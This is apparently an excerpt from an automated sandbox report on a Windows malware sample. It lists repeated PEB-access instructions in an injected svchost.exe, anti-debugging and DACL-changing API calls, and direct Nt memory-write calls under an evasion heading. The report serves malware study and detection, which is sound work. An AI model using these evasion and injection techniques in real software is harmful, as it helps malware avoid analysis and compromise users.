                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E59C mov eax, dword ptr fs:[00000030h]1_2_0336E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov eax, dword ptr fs:[00000030h]1_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov ecx, dword ptr fs:[00000030h]1_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364588 mov eax, dword ptr fs:[00000030h]1_2_03364588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033325E0 mov eax, dword ptr fs:[00000030h]1_2_033325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033365D0 mov eax, dword ptr fs:[00000030h]1_2_033365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C427 mov eax, dword ptr fs:[00000030h]1_2_0332C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC460 mov ecx, dword ptr fs:[00000030h]1_2_033BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA456 mov eax, dword ptr fs:[00000030h]1_2_033EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332645D mov eax, dword ptr fs:[00000030h]1_2_0332645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335245A mov eax, dword ptr fs:[00000030h]1_2_0335245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033644B0 mov ecx, dword ptr fs:[00000030h]1_2_033644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BA4B0 mov eax, dword ptr fs:[00000030h]1_2_033BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033364AB mov eax, dword ptr fs:[00000030h]1_2_033364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA49A mov eax, dword ptr fs:[00000030h]1_2_033EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033304E5 mov ecx, dword ptr fs:[00000030h]1_2_033304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404B00 mov eax, dword ptr fs:[00000030h]1_2_03404B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332CB7E mov eax, dword ptr fs:[00000030h]1_2_0332CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328B50 mov eax, dword ptr fs:[00000030h]1_2_03328B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEB50 mov eax, dword ptr fs:[00000030h]1_2_033DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB40 mov eax, dword ptr fs:[00000030h]1_2_033FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8B42 mov eax, dword ptr fs:[00000030h]1_2_033D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EBFC mov eax, dword ptr fs:[00000030h]1_2_0335EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCBF0 mov eax, dword ptr fs:[00000030h]1_2_033BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEBD0 mov eax, dword ptr fs:[00000030h]1_2_033DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA24 mov eax, dword ptr fs:[00000030h]1_2_0336CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EA2E mov eax, dword ptr fs:[00000030h]1_2_0335EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCA11 mov eax, dword ptr fs:[00000030h]1_2_033BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEA60 mov eax, dword ptr fs:[00000030h]1_2_033DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386AA4 mov eax, dword ptr fs:[00000030h]1_2_03386AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368A90 mov edx, dword ptr fs:[00000030h]1_2_03368A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404A80 mov eax, dword ptr fs:[00000030h]1_2_03404A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330AD0 mov eax, dword ptr fs:[00000030h]1_2_03330AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h] 1_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h] 1_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03404940 mov eax, dword ptr fs:[00000030h] 1_2_03404940
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B892A mov eax, dword ptr fs:[00000030h] 1_2_033B892A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C892B mov eax, dword ptr fs:[00000030h] 1_2_033C892B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BC912 mov eax, dword ptr fs:[00000030h] 1_2_033BC912
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03328918 mov eax, dword ptr fs:[00000030h] 1_2_03328918
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03328918 mov eax, dword ptr fs:[00000030h] 1_2_03328918
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h] 1_2_033AE908
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h] 1_2_033AE908
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h] 1_2_033D4978
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h] 1_2_033D4978
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BC97C mov eax, dword ptr fs:[00000030h] 1_2_033BC97C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03356962 mov eax, dword ptr fs:[00000030h] 1_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03356962 mov eax, dword ptr fs:[00000030h] 1_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03356962 mov eax, dword ptr fs:[00000030h] 1_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0337096E mov eax, dword ptr fs:[00000030h] 1_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0337096E mov edx, dword ptr fs:[00000030h] 1_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0337096E mov eax, dword ptr fs:[00000030h] 1_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B0946 mov eax, dword ptr fs:[00000030h] 1_2_033B0946
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B89B3 mov esi, dword ptr fs:[00000030h] 1_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h] 1_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h] 1_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h] 1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033309AD mov eax, dword ptr fs:[00000030h] 1_2_033309AD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033309AD mov eax, dword ptr fs:[00000030h] 1_2_033309AD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h] 1_2_033629F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h] 1_2_033629F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BE9E0 mov eax, dword ptr fs:[00000030h] 1_2_033BE9E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033649D0 mov eax, dword ptr fs:[00000030h] 1_2_033649D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FA9D3 mov eax, dword ptr fs:[00000030h] 1_2_033FA9D3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C69C0 mov eax, dword ptr fs:[00000030h] 1_2_033C69C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h] 1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h] 1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h] 1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov ecx, dword ptr fs:[00000030h] 1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h] 1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352835 mov eax, dword ptr fs:[00000030h] 1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336A830 mov eax, dword ptr fs:[00000030h] 1_2_0336A830
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D483A mov eax, dword ptr fs:[00000030h] 1_2_033D483A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D483A mov eax, dword ptr fs:[00000030h] 1_2_033D483A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BC810 mov eax, dword ptr fs:[00000030h] 1_2_033BC810
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h] 1_2_033BE872
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h] 1_2_033BE872
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00940B62
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00912622
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0090083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0090083F
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_009009D5 SetUnhandledExceptionFilter, 0_2_009009D5
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00900C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00900C21

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
